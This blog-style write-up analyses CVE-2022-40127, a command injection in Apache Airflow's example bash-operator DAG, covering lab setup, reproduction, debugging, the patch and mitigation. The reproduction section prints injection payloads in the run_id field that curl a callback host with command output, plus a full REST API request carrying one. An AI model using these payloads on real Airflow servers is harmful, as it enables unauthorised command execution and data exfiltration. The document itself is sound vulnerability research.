RCE via example DAG in Apache Airflow (CVE-2022–40127)

14 min readAug 21, 2023

Summary

In this writeup, we delve into the analysis of command injection vulnerability (known as CVE-2022–40127) leading to remote command execution (RCE) found in Apache Airflow.

Description

Introduction

In this writeup, we delve into the analysis of a command injection

vulnerability known as CVE-2022–40127 leading to remote command execution (RCE) found in Apache Airflow. (If you are not a security expert: command injection vulnerabilities occur when an attacker manipulates the system to execute unintended commands by injecting malicious code or unauthorized inputs into the application.)

The official description says no more than:

“A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter.”

We will discuss everything to understand the security issue and also, perform the attack from both the UI and from the Airflow REST API.

This issue affects Apache Airflow versions prior to 2.4.0 (released on Sep 19, 2022).

About Airflow

Apache Airflow is a popular open-source platform for orchestrating complex data workflows that have emerged as a crucial tool in data engineering and data science domains in the past few years.

You may ask how popular is this software so I leave here some information about it:

Over 8 million downloads and 20000 contributors. Over 300 companies, including Airbnb, Slack, Walmart, etc., use Airflow to run their data pipelines efficiently.[1]
Used and popular in bigger companies: 64% of Airflow users work for companies with 200+ employees which is an 11 percent increase compared to 2020.[2]
By the time of releasing this article, there were more than 11 million downloads last month on PyPI only![3]

Lab setup

I was working on Kali Linux but you can use any other Unix-based distribution.

Install Pycharm

Since Airflow has limited debugging capabilities, we install the latest version of Pycharm from the official download page[4].

Let’s put it under /opt for now. No installation is needed, can be used as a standalone.

Install Python3.8

Since the highest supported version of Python was 3.8 at the time of the Airflow release version 2.3.4, we install version 3.8. I followed this tutorial:

https://linuxize.com/post/how-to-install-python-3-8-on-debian-10/

Then I upgraded pip (because why not):

pip3.8 install --upgrade pip

Then activate a virtual environment in a working directory:

cd /opt
mkdir airflow && cd airflow
python3.8 -m venv airflow-2.3.4
cd airflow-2.3.4
chmod +x ./bin/activate
source bin/activate

Install Airflow

Let’s install Apache Airflow’s vulnerable version (2.3.4) with its providers. Based on the notes of the official page[5], we should install it with the right versions of the providers.

Since we want to use Python 3.8, our magic install command will be the following:

pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"

Verify if the installation was successful:

which airflow

The output should be:

/opt/airflow/airflow-2.3.4/bin/airflow

Also, verify if the correct version is installed with airflow info:

Alternative installation

If you don’t want to debug the app, you can go with a Docker compose file:

cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
# Download the docker-compose file
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
# Run Airflow
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up -d
open localhost:8080

Configure project settings in Pycharm

Go into the folder of the installed airflow package:

cd lib/python3.8/site-packages/airflow

Run Pycharm from this directory with /opt/pycharm-2023.1.4/bin/pycharm.sh.

Click on “Trust project” if asked.

Our next task is to configure some project settings and the run and debug properties. Start with setting the proper interpreter. Click on the Python label in the bottom right corner of the Pycharm and select, then Add Local Interpreter.

Set the Location and the Base interpreter to venv’s Python 3.8:

The Python interpreter should be at /opt/airflow/airflow-2.3.4/bin/python3.8.

Then, modify the run/debug configurations.

The script path should point to the main method:

/opt/airflow/airflow-2.3.4/lib/python3.8/site-packages/airflow/__main__.py

Give standalone as a parameter since at first, we want to run the whole app, not just one component. Then, click on Apply.

Make sure you have the same config as below in the Settings (File / Settings / Build, Execution, Deployment / Python Debugger):

Now we have everything to run the Airflow standalone from Pycharm so click on the Run icon!

If everything is fine, then you should see that the webserver and all the components are running in the console.

Then, open http://localhost:8080 in a browser. You should see the login page:

The login credentials are in the logs. Log in with them.

Reproducing the vulnerability

1. Via the UI

So let’s try to exploit the vulnerability via the built-in UI of the webserver. As a commonly used approach, we will inject an OS command to perform a DNS lookup to a server we own. There are free solutions to do it (eg. http://dnslog.cn/) but we’ll use our favorite Burp Pro’s Collaborator toolkit.

Let’s open the example_bash_operator default example DAG.

We can give a run ID by triggering a DAG with a custom config, so let’s click on the blueish “▶” button and select Trigger DAG w/ config!

The Run ID will be something like this:

\";curl uname.collaborator.url.com;\""

Let’s fire up the Collaborator, and paste the URL from the clipboard to the JSON object above!

Click on the “Trigger” labeled button to push the DAG into the queue.

You should see the following message: “Triggered example_bash_operator, it should start any moment now.”

In the Graph menu of a DAG, you can check how the process is going on. When it’s at also_run_this part, check the Collaborator:

Ohh, there it is! The command uname is processed and the result of it is sent to the collaborator server as a subdomain. Just as we expected. Now let’s move on to the API and see how to perform the same RCE with it.

2. Via the API

After some research, I found that triggering a new DAG with a run_id is also possible[6] via the REST API coming with the Airflow.

Additionally, you can check the same reference in the running instance locally via both a SwaggerUI and Redoc:

Based on the resources above we can achieve the same effect as with the UI by running this curl command:

curl -X POST http://127.0.0.1:8080/api/v1/dags/example_bash_operator/dagRuns \

  -H 'accept: application/json'           \
  -H 'Content-Type: application/json' \
  -H 'Cookie: session=[REDACTED]' \
  -d '{
"conf": {},
"dag_run_id": "run_id\"; curl whoami.collaborator_url.com"
}'

You should get a similar response from curl (and don’t forget to check the collaborator as well):

3. Using custom exploit

Since I couldn’t find any exploit in the wild for the CVE, I wrote my own that gives us a reverse shell too. I’ll write about the exploit in a separate article.

https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE

Static analysis

The basic architecture of Airflow

Apache Airflow follows a distributed architecture that enables the orchestration and scheduling of complex data workflows. At its core, Airflow consists of several key components that work together to facilitate the efficient execution of tasks and manage dependencies. Let’s see the most important terms to understand the architecture of Airflow and what’s are these components.

Scheduler: The scheduler component is responsible for determining when and how tasks should be executed. It also submits tasks to the executor to run.
Executor: Handles running tasks.
Workers: responsible for executing tasks in a distributed manner. They pull tasks from the task queue and execute them on separate worker nodes, allowing for parallel execution and scalability.
Task Dependencies: Airflow allows users to define dependencies between tasks using directed acyclic graphs (DAGs). This is the core concept of Airflow. Tasks can be chained together, allowing for complex workflows with conditional branching and parallelism. Tasks are triggered based on their dependencies and the success or failure of preceding tasks.
Metadata database: Airflow utilizes a metadata database, such as MySQL or PostgreSQL, to store information used by the executor and scheduler about the workflow, tasks, and their dependencies.
Webserver: Airflow provides a web-based user interface called the Airflow UI or the Airflow Webserver to inspect, trigger and debug the behavior of DAGs and tasks.
Operators: Airflow provides a wide range of built-in operators that define the actions performed by tasks, such as executing a shell command, running a SQL query, or transferring files. Executors manage the execution of these operators, ensuring they are executed as specified and handling their results and states.

(source: https://airflow.apache.org/docs/apache-airflow/stable/core-concepts/overview.html)

By leveraging this architecture, Apache Airflow enables users to define, schedule, and monitor complex data workflows. Its distributed nature, coupled with the ability to define dependencies and utilize various executors, makes it a powerful tool for orchestrating data pipelines, ETL (Extract, Transform, Load) processes, and other data-driven tasks in a reliable and scalable manner.

Analyzing the vulnerable DAG

There are some example DAGs coming with a basic Airflow installation. We know that the vulnerability we search for is one of them.

After running through these examples I found example_bash_operator scary enough to check its source.

Let’s check the source code of the DAG by navigating to the “Code” section.

A small reminder from the original CVE description:

“A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter.”

So where the run_id parameter is used in this code? Have you spotted the suspicious snippet on line 61?

bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',

If you are not familiar with Python and wondering what those curly braces mean, then let’s see what the official Python documentation[7] says about these:

“Format strings contain “replacement fields” surrounded by curly braces {}. Anything that is not contained in braces is considered literal text, which is copied unchanged to the output. If you need to include a brace character in the literal text, it can be escaped by doubling: {{ and }}.”

These placeholders are typically used in the context of templating engines, such as Jinja, to substitute values dynamically. The actual values for run_id and dag_run would be provided during the execution of the bash command.

If you have the eyes of a hacker, you may already have noticed that this snippet exactly looks like that something that contains a command injection vulnerability. Because of the echo Unix command we can assume that the string represents a bash command that will be executed when triggered within the context of a Python script or a system command.

The next question is: what the bash_command will be if the content of run_id that can be given by a user is not properly sanitized? So if the value of run_id is, for example, any_run_id"; whoami", then the bash command will be:

'echo "run_id= any_run_id”;whoami | dag_run={{ dag_run }}"'

Note that the argument of the echo command is enclosed by a double quote and a new bash command (whoami) is introduced with the “;” character.

Some notes on other parts of the code:

- In lines 29–37, there is a DAG declaration.

- In lines 43–46, there is the run_this task definition and on line 49th it is added as a dependency task to run_this_last task.

- Tasks have dependencies declared on each other. In the 64th line, you can see that the DAG defines also_run_this task as a dependency to run_this_last task.

Debugging

The settings needed for debugging are already applied in the “Lab setup” section so please check it if you skipped that part.

To see how the data (run_id) flows we have to make some modifications due

to very unique characteristics of Airflow. Frankly, this is the most painful thing in this analysis: when you run a “standalone” version of the Airflow from any IDE, the breakpoints won’t hit except in the main method. After spending 2 days trying to figure out why debugging is not working as it should, I finally found a solution that is not perfect but at least working.

As was mentioned in the “Static analysis” section, the Airflow has three main components that are started as a separate process. If you start these processes separately, then the breakpoints will hit. So this is what we will do. These main components are:

scheduler
triggerer
webserver

Figuring out which code belongs to which component is not obvious in all cases. The webserver is built with Flask, and I found that the code

handling the /trigger view is in the /www/views.py (line 1965).

As a next step, we try to keep track of the run_id. For this, set the run/debug config to run the webserver only (running the scheduler and the triggerer services is not needed at this point).

Trigger the DAG with simply PLACEHOLDER.

As you can see in the next picture, a new DAGrun is created in the view.py (line 2077) by calling models.dag.create_dagrun() (see dag.py).

In line 2379 in dag.py a new DagRun class is created and added to the actual session and – as the comment says - the associated task instance is created. After modifying the DAG with our custom run_id parameter, a new run is triggered.

The next part is associated with the triggerer component so let’s modify the run/debug config by changing webserver to triggerer.

The next target of interest is figuring out what exactly happens when the example_bash_operator.py is triggered by the executor, so set breakpoints on line 61 to see what will be the value of bash_command.

This time we send a “real” attack payload instead of PLACEHOLDER.

However, the run_id is not replaced this time so we have to find another breakpoint to catch the command injection.

Well… Working with such a large codebase, sometimes we have to be creative a bit. After the DAG is triggered, you can see the logs by clicking on a task in the Graph submenu of a DAG in the webserver. In the last DAG execution, you can see that the also_run_this BashOperator’s command that was in its bash_command variable is executed with a subprocess. Although it’s also part of the Python standard library, this is called Airflow’s /hooks/subprocess.py. We can figure it out by searching for the log string in PyCharm’s built-in search tool (Find in Files menu – you can reach it by right click on the base folder and selecting this menu).

So let’s see what’s happening there. On the 76th line, a new process is executed with the command list that is the following (based on the logs):

['/usr/bin/bash', '-c', 'echo "run_id=\\";curl whoami.collaborator-url.com;\\"" | dag_run=<DagRun example_bash_operator @ 2023-07-20 13:52:16+00:00: \\";curl whoami. collaborator. url.com;\\"", state:running, queued_at: 2023-07-20 13:52:21.982883+00:00. externally triggered: True>"']

The official docs say that subprocess.Popen (that is called here) the

following: “Execute a child program in a new process.”[8] So this is where our beloved command injection takes place.

The next issue I faced was that whichever Airflow component I loaded to Pycharm to debug, the breakpoints I set in this class were never hit. Since we have everything to understand the bug and since it’s closely impossible to figure out how the call chaining works under the hood in this case and also, due to the built-in logging it’s completely clear how the command injection works, I ended up here.

Patch diffing

The official fix is quite simple for this vulnerability. Since it affects the bash operator example DAG (airflow/example_dags/example_bash_operator.py), the patch is not more than this:

Since the run_id can’t be tampered with by the user anymore and it’s not reflected in the code, the code injection vulnerability is resolved.

You can check the diff here:

https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a

Mitigation

The mitigation is simple:

Update the Airflow to a version above 2.3.4.
Do not enable example DAGs on systems that should not allow UI users to execute an arbitrary command.

Final thoughts

The process of figuring out how to perform the attack based on the one-sentence-long description of the official CVE report on a recent Apache Airflow vulnerability has been both challenging and enlightening. One of the notable difficulties encountered during this analysis was the intricacy of debugging the vulnerability and understanding its root cause. (To be honest, I am still not sure whether is it possible to debug the whole app running as a standalone so if you have a solution, please contact me!)

Command injection and RCE vulnerabilities often involve complex interactions between user inputs, command execution, and potential code injections, making them particularly challenging to trace and mitigate. However, this type was perhaps among the simplest ones. One of the most significant takeaways from this process is that finding severe vulnerabilities does not always rely on chaining complex vulnerabilities together. On a personal note, delving into this vulnerability has been a tremendous learning experience. I gained valuable insights into the intricacies of command injection vulnerabilities, their potential impact, and the best practices to mitigate such risks effectively. The analysis has deepened my understanding of secure coding principles, input validation, and the importance of following secure development practices from the earliest stages of software design.

Another important takeaway was getting familiar with the architecture of Airflow, which opened the doors to further vulnerability analysis and even the possibility of finding my own vulnerabilities in this software.